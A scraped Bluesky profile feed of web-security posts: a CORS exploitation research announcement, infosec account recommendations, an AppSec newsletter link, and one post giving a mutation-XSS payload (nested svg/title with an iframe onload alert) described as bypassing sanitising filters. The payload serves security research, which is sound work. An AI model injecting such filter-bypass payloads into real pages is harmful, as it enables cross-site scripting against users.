Krassen Deltchev's Avatar

Krassen Deltchev

@test2v.bsky.social

#TBA, *Security

8 Followers  |  12 Following  |  1 Posts  |  Joined: 21.09.2023  |  1.6517

Latest posts by test2v.bsky.social on Bluesky

Preview
Exploiting trust: Weaponizing permissive CORS configurations Find out whether you’re underestimating Cross-Origin Resource Sharing (CORS) vulnerabilities in our latest research.

Excited to release my latest research. Exploiting CORS can be a tricky in modern web apps, but there are still critical cases out there if you know what to look for. If you want to learn more about CORS exploitation, the research is available at

25.10.2024 07:53 β€” πŸ‘ 19    πŸ” 4    πŸ’¬ 0    πŸ“Œ 1

Custom lists are super cool! I enjoy reading social posts, but want to make sure I never miss a quality writeup or technique. To achieve this, I'm building a 'high signal web security' list of topic-focused accounts, which you can pin next to 'Following' if you want :)
bsky.app/profile/jame...

25.11.2024 13:09 β€” πŸ‘ 57    πŸ” 16    πŸ’¬ 2    πŸ“Œ 0

Last week, a number of infosec companies began posting on Bluesky. Allow me to mention just a few...

@caido.io
@sensepost.com
@portswigger.net
@sansisc.bsky.social
@compasssecurity.bsky.social

25.11.2024 16:09 β€” πŸ‘ 28    πŸ” 9    πŸ’¬ 2    πŸ“Œ 0
AppSec Ezine

Here’s edition #562 of the weekly AppSec ezine, full of curated links 🎁

25.11.2024 18:53 β€” πŸ‘ 9    πŸ” 3    πŸ’¬ 0    πŸ“Œ 1
<svg><title><title><image href="</title><iframe onload=alert(1)>"></title></title></svg>

<svg><title><title><image href="</title><iframe onload=alert(1)>"></title></title></svg>

Universal MXSS. Works in all browsers and is likely to bypass lots of filters because title is both an SVG and HTML tag. Briefly checked DOM Purify and it looked okay.

10.11.2023 18:40 β€” πŸ‘ 15    πŸ” 6    πŸ’¬ 0    πŸ“Œ 0

Habe ich selber auch festgestellt. Kommisch, oder?…
βœŒοΈπŸ˜‰πŸ‘

21.09.2023 17:23 β€” πŸ‘ 0    πŸ” 0    πŸ’¬ 1    πŸ“Œ 0

@test2v is following 12 prominent accounts